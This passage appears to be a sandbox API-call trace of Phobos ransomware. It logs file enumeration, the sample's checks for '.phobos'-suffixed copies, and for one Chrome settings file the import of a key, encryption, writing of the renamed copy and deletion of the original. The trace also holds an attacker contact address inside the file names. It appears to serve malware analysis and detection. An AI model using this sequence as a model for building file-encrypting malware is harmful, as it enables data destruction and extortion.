"c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.199] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=16384) returned 1 [0113.199] CloseHandle (hObject=0x2b4) returned 1 [0113.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")) returned 0x2020 [0113.199] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.199] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.199] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=1048) returned 1 [0113.199] CloseHandle (hObject=0x2b4) returned 1 [0113.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db")) returned 0x2020 [0113.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.200] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.200] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=1216) returned 1 [0113.200] CloseHandle (hObject=0x2b4) returned 1 [0113.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db")) returned 0x2020 [0113.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.200] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.200] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.201] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=2312) returned 1 [0113.201] CloseHandle (hObject=0x2b4) returned 1 [0113.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db")) returned 0x2020 [0113.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.201] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.201] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=1048) returned 1 [0113.201] CloseHandle (hObject=0x2b4) returned 1 [0113.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db")) returned 0x2020 [0113.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.201] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.202] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=2312) returned 1 [0113.202] CloseHandle (hObject=0x2b4) returned 1 [0113.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db")) returned 0x2020 [0113.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4e4260a4-7e39-442e-bc22-7ff751d1c161}.2.ver0x0000000000000002.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.202] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.202] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=193424) returned 1 [0113.202] CloseHandle (hObject=0x2b4) returned 1 [0113.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db")) returned 0x2020 [0113.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.203] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000011.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.203] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.203] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.203] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=194032) returned 1 [0113.203] CloseHandle (hObject=0x2b4) returned 1 [0113.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db")) returned 0x2020 [0113.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.203] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.203] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.203] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0113.203] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=415096) returned 1 [0113.203] CloseHandle (hObject=0x2b4) returned 1 [0113.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")) returned 0x2020 [0113.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.204] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.204] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0113.204] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a8 [0113.362] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=612) returned 1 [0113.363] CloseHandle (hObject=0x2a8) returned 1 [0113.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini")) returned 0x26 [0113.363] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0113.363] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0113.363] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.423] ResetEvent (hEvent=0x278) returned 1 [0122.424] SetEvent (hEvent=0x27c) returned 1 [0122.424] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0122.424] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0122.425] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=119) returned 1 [0122.425] CloseHandle (hObject=0x298) returned 1 [0122.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml")) returned 0x2020 [0122.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.425] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\programdata\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.425] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.539] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.744] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0122.880] ResetEvent (hEvent=0x278) returned 1 [0122.880] SetEvent (hEvent=0x27c) returned 1 [0122.880] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3c6fdb0 | out: pbBuffer=0x3c6fdb0) returned 1 [0122.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0122.881] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3c6fd50 | out: lpFileSize=0x3c6fd50*=40) returned 1 [0122.881] CloseHandle (hObject=0x348) returned 1 [0122.881] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat")) returned 0x2020 [0122.881] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0122.881] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3c6fcf0 | out: lpNewFilePointer=0x0) returned 1 [0122.881] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3c6fcf0 | out: lpNewFilePointer=0x0) returned 1 [0122.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.881] CryptImportKey (in: hProv=0x254d70, pbData=0x3c6fca8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3c6fd04 | out: phKey=0x3c6fd04*=0x29c420) returned 1 [0122.881] CryptSetKeyParam (hKey=0x29c420, dwParam=0x1, pbData=0x3c6fdb0, dwFlags=0x0) returned 1 [0122.881] ReadFile (in: hFile=0x348, lpBuffer=0x42b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3c6fd2c, lpOverlapped=0x0 | out: lpBuffer=0x42b0020*, lpNumberOfBytesRead=0x3c6fd2c*=0x28, lpOverlapped=0x0) returned 1 [0122.891] CryptEncrypt (in: hKey=0x29c420, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x42b0020*, pdwDataLen=0x3c6fcc8*=0x30, dwBufLen=0x30 | out: pbData=0x42b0020*, pdwDataLen=0x3c6fcc8*=0x30) returned 1 [0122.891] WriteFile (in: hFile=0x330, lpBuffer=0x42b0020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x3c6fd10, lpOverlapped=0x0 | out: lpBuffer=0x42b0020*, lpNumberOfBytesWritten=0x3c6fd10*=0x30, lpOverlapped=0x0) returned 1 [0122.893] CryptImportKey (in: hProv=0x254d70, pbData=0x3c6fc9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3c6fd08 | out: phKey=0x3c6fd08*=0x29c4a0) returned 1 [0122.893] CryptSetKeyParam (hKey=0x29c4a0, dwParam=0x1, pbData=0x3c6fdb0, dwFlags=0x0) returned 1 [0122.893] CryptEncrypt (in: hKey=0x29c4a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x42b0020*, pdwDataLen=0x3c6fcc8*=0x40, dwBufLen=0x40 | out: pbData=0x42b0020*, pdwDataLen=0x3c6fcc8*=0x40) returned 1 [0122.893] CryptDestroyKey (hKey=0x29c4a0) returned 1 [0122.893] WriteFile (in: hFile=0x330, lpBuffer=0x42b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x3c6fd10, lpOverlapped=0x0 | out: lpBuffer=0x42b0020*, lpNumberOfBytesWritten=0x3c6fd10*=0xf2, lpOverlapped=0x0) returned 1 [0122.893] CryptDestroyKey (hKey=0x29c420) returned 1 [0122.893] CloseHandle (hObject=0x348) returned 1 [0122.893] CloseHandle (hObject=0x330) returned 1 [0122.894] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat")) returned 1 [0122.895] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0123.342] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0123.389] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0123.461] WaitForSingleObject (hHandle=0x278, dwMilliseconds=0xffffffff) returned 0x0 [0124.832] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x50) returned 0x1db1470 [0124.832] CryptImportKey (in: hProv=0x254d70, pbData=0x3c6fcf8, 